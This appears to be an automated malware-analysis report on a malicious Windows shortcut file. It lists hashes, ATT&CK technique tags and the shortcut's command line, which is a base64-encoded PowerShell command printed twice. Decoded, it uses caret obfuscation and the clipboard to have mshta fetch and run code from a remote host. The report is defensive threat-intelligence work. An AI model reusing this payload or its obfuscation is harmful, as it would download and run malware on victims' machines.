Malicious

6249bc1ecc0f57fdd1069fbcf6c7fb7b

LNK File | MD5: 6249bc1ecc0f57fdd1069fbcf6c7fb7b | Size: 2.5 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
Hash | Hash Value
MD5 | 6249bc1ecc0f57fdd1069fbcf6c7fb7b
Sha1 | 4fa8557fbd2d024a5041fd1fd4ac605d51aa3fde
Sha256 | 33bc7917b130f8405a350e5bacc78103157d20bfa2e205c34235c804427c7b60
Sha384 | 3803e4a6e4fe6bf9266e70300f80a7b05ede18bea10157960c339277e69c43fd53c210c9263f398c363d6cf5fa8791f9
Sha512 | 383870b19fff703965cc338ae745273f03f874f89b75791f8c509458245442e3863f5c30d024522656d79fd18b5a8ef84d48545827e852acec59fc47d71c6187
SSDeep | 24:8Ayw/BHYVKVWf+/CWuOGqXkixaAk7GcZOBXZzJm0sHCEJMdd79dsrab7Z:8y5aBHqXkJAk7GcMJUiuMdJ9AaZ
TLSH | 8251C1281AF202E9F277CB756BF977B34576FA96CD2446BC008062451622510F467E7B
File Structure
6249bc1ecc0f57fdd1069fbcf6c7fb7b
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
